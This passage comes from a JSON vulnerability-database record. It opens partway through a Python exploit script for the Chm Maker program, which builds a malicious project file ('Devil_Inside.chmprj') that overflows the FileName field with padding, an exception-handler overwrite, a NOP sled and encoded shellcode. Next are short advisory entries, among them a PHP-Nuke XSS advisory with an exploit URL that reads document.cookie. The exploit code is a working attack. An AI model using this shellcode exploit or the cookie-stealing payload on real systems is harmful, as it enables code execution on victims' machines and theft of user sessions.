x56\\x4c\\x4b\\x54\"\r\n\"\\x4c\\x62\\x6b\\x6e\\x6b\\x31\\x4f\\x67\\x6c\\x37\\x71\\x78\\x6b\\x4c\\x4b\\x45\"\r\n\"\\x4c\\x4c\\x4b\\x73\\x31\\x4a\\x4b\\x6c\\x49\\x51\\x4c\\x74\\x64\\x67\\x74\\x6b\"\r\n\"\\x73\\x34\\x71\\x6f\\x30\\x42\\x44\\x6c\\x4b\\x71\\x50\\x34\\x70\\x4e\\x65\\x4f\"\r\n\"\\x30\\x62\\x58\\x46\\x6c\\x6c\\x4b\\x41\\x50\\x44\\x4c\\x4c\\x4b\\x42\\x50\\x65\"\r\n\"\\x4c\\x4e\\x4d\\x6e\\x6b\\x50\\x68\\x34\\x48\\x4a\\x4b\\x73\\x39\\x6e\\x6b\\x4b\"\r\n\"\\x30\\x4c\\x70\\x57\\x70\\x63\\x30\\x37\\x70\\x4e\\x6b\\x42\\x48\\x57\\x4c\\x51\"\r\n\"\\x4f\\x56\\x51\\x48\\x76\\x31\\x70\\x73\\x66\\x6e\\x69\\x59\\x68\\x4e\\x63\\x4f\"\r\n\"\\x30\\x73\\x4b\\x66\\x30\\x65\\x38\\x68\\x70\\x6d\\x5a\\x34\\x44\\x51\\x4f\\x30\"\r\n\"\\x68\\x4e\\x78\\x4b\\x4e\\x6c\\x4a\\x54\\x4e\\x32\\x77\\x79\\x6f\\x79\\x77\\x41\"\r\n\"\\x73\\x75\\x31\\x72\\x4c\\x41\\x73\\x57\\x70\\x61\")\r\n\r\nheader1 = (\r\n'<?xml version=\"1.0\" encoding=\"Windows-1252\" ?>\\n'\r\n'<XMLConfig><info>Chm Maker project</info>\\n'\r\n'<group name=\"Contents\">\\n'\r\n' <group name=\"0\">\\n'\r\n' <param name=\"Caption\">filename</param>\\n'\r\n' <param name=\"Level\">0</param>\\n'\r\n' <param name=\"FileName\">'+\"\\x41\"*320+ns+sh+\"\\x90\"*20+shellcode+\"\\x41\" * 5000)\r\n\r\nheader2 = (\r\n'</param>\\n'\r\n' </group>\\n'\r\n' <param name=\"Count\">1</param>\\n'\r\n'</group>\\n'\r\n'<group name=\"Keywords\">\\n'\r\n' <param name=\"Count\">0</param>\\n'\r\n'</group>\\n'\r\n'<group name=\"KeywordsFinder\">\\n'\r\n' <param name=\"UseMeta\">1</param>\\n'\r\n' <param name=\"UseBold\">1</param>\\n'\r\n' <param name=\"UseItalic\">0</param>\\n'\r\n' <param name=\"UseUnder\">0</param>\\n'\r\n' <param name=\"UseHTag\">1</param>\\n'\r\n' <param name=\"UseTabHeader\">0</param>\\n'\r\n' <param name=\"MaxKeyLength\">32</param>\\n'\r\n' <param name=\"LiveUpdate\">0</param>\\n'\r\n'</group>\\n'\r\n'<group name=\"Customize\">\\n'\r\n' <param name=\"MainTitle\">kkkkkkkkkkkkkkk</param>\\n'\r\n' <param name=\"DefaultPage\"></param>\\n'\r\n' <param name=\"Left\">0</param>\\n'\r\n' <param name=\"Top\">0</param>\\n'\r\n' <param name=\"Width\">0</param>\\n'\r\n' <param name=\"Heigth\">0</param>\\n'\r\n' <param name=\"HideShow\">1</param>\\n'\r\n' <param name=\"Back\">1</param>\\n'\r\n' <param name=\"Forward\">1</param>\\n'\r\n' <param name=\"Stop\">0</param>\\n'\r\n' <param name=\"Refresh\">0</param>\\n'\r\n' <param name=\"Options\">1</param>\\n'\r\n' <param name=\"Print\">1</param>\\n'\r\n' <param name=\"Font\">0</param>\\n'\r\n' <param name=\"Locate\">0</param>\\n'\r\n' <param name=\"Home\">0</param>\\n'\r\n' <param name=\"HomePage\"></param>\\n'\r\n' <param name=\"Jump1\">0</param>\\n'\r\n' <param name=\"Jump1Page\"></param>\\n'\r\n' <param name=\"Jump1Title\"></param>\\n'\r\n' <param name=\"Jump2\">0</param>\\n'\r\n' <param name=\"Jump2Page\"></param>\\n'\r\n' <param name=\"Jump2Title\"></param>\\n'\r\n' <param name=\"Search\">1</param>\\n'\r\n' <param name=\"AdditionalFiles\"></param>\\n'\r\n'</group>\\n'\r\n'</XMLConfig>\\n'\r\n)\r\n\r\n\r\nfile=open('Devil_Inside.chmprj','w')\r\nfile.write(header1+header2)\r\nfile.close()\r\n\r\n\r\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7920"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:19", "bulletinFamily": "software", "description": "Heap overflow during ARJ parsing.", "modified": "2005-02-25T00:00:00", "published": "2005-02-25T00:00:00", "id": "SECURITYVULNS:VULN:4523", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4523", "title": "Trend Micro AntiVirus library ARJ archives buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:17", "bulletinFamily": "software", "description": "No description provided", "modified": "2003-05-17T00:00:00", "published": "2003-05-17T00:00:00", "id": "SECURITYVULNS:VULN:2814", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:2814", "title": "CGI bugs", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:07", "bulletinFamily": "software", "description": "------------------------------------------------------\r\nPHPNuke "Your Account" XSS Vulnerability\r\n------------------------------------------------------\r\n\r\n------------------------------------------------------\r\nVulnerable;\r\n------------------------------------------------------\r\nFrancisco Burzi PHP-Nuke 6.5 Final Release\r\n\r\n------------------------------------------------------\r\nNot tested but %90 vulnerable;\r\n------------------------------------------------------\r\nFrancisco Burzi PHP-Nuke 5.6\r\nFrancisco Burzi PHP-Nuke 6.0\r\nFrancisco Burzi PHP-Nuke 6.5 RC3\r\nFrancisco Burzi PHP-Nuke 6.5 RC2\r\nFrancisco Burzi PHP-Nuke 6.5 RC1\r\nFrancisco Burzi PHP-Nuke 6.5\r\n\r\n------------------------------------------------------\r\nAbout PHPNuke;\r\n------------------------------------------------------\r\nPHP Based Content Management System\r\nhttp://www.phpnuke.org\r\n\r\n------------------------------------------------------\r\nSolution;\r\n------------------------------------------------------\r\nSimple string check or user check should be OK !\r\n\r\n------------------------------------------------------\r\nExploit;\r\n------------------------------------------------------\r\nhttp://[victim]/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>\r\n\r\n*You may need to login first.\r\n**Some of servers/PHP Nuke Systems has a security check for "<script>"\r\nstrings for Querystrings or POST variables (ie. www.phphnuke.org). But this\r\nsystems are still vulnerable. You can skip these controls with some JS\r\ntricks.\r\n\r\n\r\nFerruh Mavituna\r\nFreelance Developer & Designer\r\nhttp://ferruh.mavituna.com\r\nferruh@mavituna.com\r\n", "modified": "2003-05-14T00:00:00", "published": "2003-05-14T00:00:00", "id": "SECURITYVULNS:DOC:4523", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4523", "title": "PHPNuke "Your Account" XSS Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}